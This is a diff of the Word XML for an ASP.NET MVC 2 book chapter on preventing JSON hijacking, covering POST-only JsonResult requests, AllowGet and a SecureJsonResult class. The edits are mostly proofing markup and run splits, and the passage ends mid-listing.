-        <w:t>In the next section we'll look at JSON hijacking, another attack that requires developers using ASP.NET MVC 2 take certain precautions.</w:t>
+        <w:t xml:space="preserve">In the next section we'll look at JSON hijacking, another attack that requires developers using ASP.NET MVC 2 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>take</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> certain precautions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2531,7 +3703,13 @@
         <w:t xml:space="preserve"> a rare hack</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> similar to XSRF, except it's targetted to request secure JSON from vulnerable applications.  The JSON hijacking process involves several steps:</w:t>
+        <w:t xml:space="preserve"> sim</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ilar to XSRF, except it's targe</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ted to request secure JSON from vulnerable applications.  The JSON hijacking process involves several steps:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2580,19 +3758,37 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The solution to this exploit offered by ASP.NET MVC 2 is to only accept requests for JSON data by HTTP POST requests, rather than by GETs.  </w:t>
+        <w:t xml:space="preserve">The solution to this exploit offered by ASP.NET MVC 2 is to only accept requests for JSON data by HTTP POST requests, rather than by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GETs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">.  </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">This is baked into and enforced by the standard </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>JsonResult</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> action result that ships with the framework.  If we were to request data returned by JsonResult with a GET request, we would not receive the JSON data. Listing 11.12 shows how we must issue a POST from JavaScript code requesting JSON data.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> action result that ships with the framework.  If we were to request data returned by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with a GET request, we would not receive the JSON data. Listing 11.12 shows how we must issue a POST from JavaScript code requesting JSON data.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2608,16 +3804,52 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;script type="text/javascript"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>$.postJSON = function(url, data, callback) {</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>script</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> type="text/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>$.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postJSON</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = function(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, data, callback) {</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">               #|1</w:t>
@@ -2632,7 +3864,30 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>$.post(url, data, callback, "json");</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>$.post</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, data, callback, "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>");</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">               #|1</w:t>
@@ -2664,16 +3919,44 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>$(function() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">$.postJSON('/post/getsecurejsonpost', </w:t>
+        <w:t>$(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>function</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>$.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postJSON</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('/post/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getsecurejsonpost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">', </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                     #|2</w:t>
@@ -2688,7 +3971,14 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>function(data) {</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>function</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(data) {</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                                    </w:t>
@@ -2709,7 +3999,16 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>var options = '';</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> options = '';</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                           </w:t>
@@ -2730,7 +4029,54 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>for (var i = 0; i &lt; data.length; i++) {</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>data.length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>++) {</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">    </w:t>
@@ -2754,7 +4100,14 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>options += '&lt;option value="' +</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>options</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> += '&lt;option value="' +</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
@@ -2778,7 +4131,30 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">data[i].Id + '"&gt;' + data[i].Title + </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>data</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>].Id + '"&gt;' + data[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">].Title + </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -2847,7 +4223,20 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>$('#securepost').html(options);</w:t>
+        <w:t>$('#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>securepost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>).html(options);</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">      </w:t>
@@ -2900,24 +4289,63 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve"> &lt;h2&gt;Secure Json (Post)&lt;/h2&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;select id="securepost"/&gt;</w:t>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>h2</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">&gt;Secure </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (Post)&lt;/h2&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>select</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> id="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>securepost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"/&gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">            #3</w:t>
@@ -2944,15 +4372,28 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#2 Our script populates select  options</w:t>
-      </w:r>
+        <w:t xml:space="preserve">#2 Our script populates </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>select  options</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#3 The target select element</w:t>
+        <w:t xml:space="preserve">#3 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> target select element</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2960,7 +4401,15 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Listing 11.12 uses the jQuery JavaScript library to craft a special POST request for our JSON data </w:t>
+        <w:t xml:space="preserve">Listing 11.12 uses the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>jQuery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> JavaScript library to craft a special POST request for our JSON data </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2997,7 +4446,21 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The problem with this approach is not necessarily technical - it works and it prevents JSON hijacking.  But it's a workaround that is sometimes uneccesary and can interfere with systems developed using the REST architectural style.  In those circumstances we have additional options.  First, we can explicitly enable JSON requests from GETs </w:t>
+        <w:t xml:space="preserve">The problem with this approach is not necessarily technical - it works and it prevents JSON hijacking.  But it's a workaround that is sometimes </w:t>
+      </w:r>
+      <w:r>
+        <w:t>unnecessary</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and can interfere with systems developed using the REST architectural style.  In those circumstances we have additional options.  First, we can explicitly enable JSON requests from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GETs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>by code shown in listing 11.13.</w:t>
@@ -3008,23 +4471,65 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.13 Directing JsonResult to accept GETs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[HttpGet]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public JsonResult GetInsecureJson()</w:t>
+        <w:t xml:space="preserve">Listing 11.13 Directing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to accept </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GETs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HttpGet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GetInsecureJson</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3041,21 +4546,59 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>object data = GetData();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>return Json(data, JsonRequestBehavior.AllowGet);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>object</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> data = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GetData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">(data, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JsonRequestBehavior.AllowGet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">      #1</w:t>
@@ -3074,15 +4617,36 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1: Directing JsonResult to allow GETs</w:t>
-      </w:r>
+        <w:t xml:space="preserve">#1: Directing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to allow </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GETs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This will allow our action to respond to normal JSON GET requests.  Finally, we can scrap JsonResult itself, instead using an action result to return only non-vulnerable, non-array formatted, JSON. </w:t>
+        <w:t xml:space="preserve">This will allow our action to respond to normal JSON GET requests.  Finally, we can scrap </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> itself, instead using an action result to return only non-vulnerable, non-array formatted, JSON. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3115,16 +4679,54 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.14 SecureJsonResult</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public class SecureJsonResult : ActionResult</w:t>
-      </w:r>
+        <w:t>Listing 11.</w:t>
+      </w:r>
+      <w:commentRangeStart w:id="16"/>
+      <w:r>
+        <w:t xml:space="preserve">14 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SecureJsonResult</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="16"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:vanish/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:commentReference w:id="16"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> class </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SecureJsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> : </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ActionResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3138,37 +4740,89 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public string ContentType { get; set; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public Encoding ContentEncoding { get; set; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public object Data { get; set; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public override void ExecuteResult(ControllerContext context)</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> string </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ContentType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> { get; set; }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Encoding </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ContentEncoding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> { get; set; }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> object Data { get; set; }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> override void </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecuteResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ControllerContext</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> context)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3185,7 +4839,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>if (context == null)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (context == null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3206,7 +4867,22 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>throw new ArgumentNullException("context");</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>throw</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ArgumentNullException</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("context");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3224,24 +4900,61 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>HttpResponseBase response = context.HttpContext.Response;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>if (!string.IsNullOrEmpty(ContentType))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HttpResponseBase</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> response = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>context.HttpContext.Response</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (!</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>string.IsNullOrEmpty</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ContentType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
         <w:tab/>
         <w:t>{</w:t>
       </w:r>
@@ -3255,7 +4968,24 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>response.ContentType = ContentType;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>response.ContentType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
